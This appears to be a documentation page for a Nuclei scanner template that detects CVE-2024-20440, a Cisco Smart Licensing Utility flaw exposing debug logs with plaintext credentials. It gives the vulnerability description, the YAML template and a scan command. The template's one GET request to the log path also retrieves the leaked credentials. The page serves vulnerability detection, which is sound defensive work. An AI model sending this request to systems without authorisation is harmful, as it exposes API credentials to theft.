Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials
ID: CVE-2024-20440
Severity: high
Author: iamnoooob,parthmalhotra,pdresearch
Tags: cve,cve2024,cisco,smart,licensing,info-leak
Description
Section titled “Description”A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to access sensitive information.This vulnerability is due to excessive verbosity in a debug log file. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain log files that contain sensitive data, including credentials that can be used to access the API.
YAML Source
Section titled “YAML Source”id: CVE-2024-20440
info: name: Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials author: iamnoooob,parthmalhotra,pdresearch severity: high description: | A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to access sensitive information.This vulnerability is due to excessive verbosity in a debug log file. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain log files that contain sensitive data, including credentials that can be used to access the API. reference: - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-20440 cwe-id: CWE-532 metadata: verified: true max-request: 1 tags: cve,cve2024,cisco,smart,licensing,info-leak
http: - raw: - | GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "csluev.log"
- type: word part: content_type words: - "text/x-log"
- type: status status: - 200# digest: 4a0a00473045022100ee22688a7a2ecebc07f528094494646756a1a8ce6304142cca93685b30e57cc702202b60cb490379267763b8b1fa71a7069b002ed7ac4bbd9c1951c6c8e418678ea5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-20440.yaml"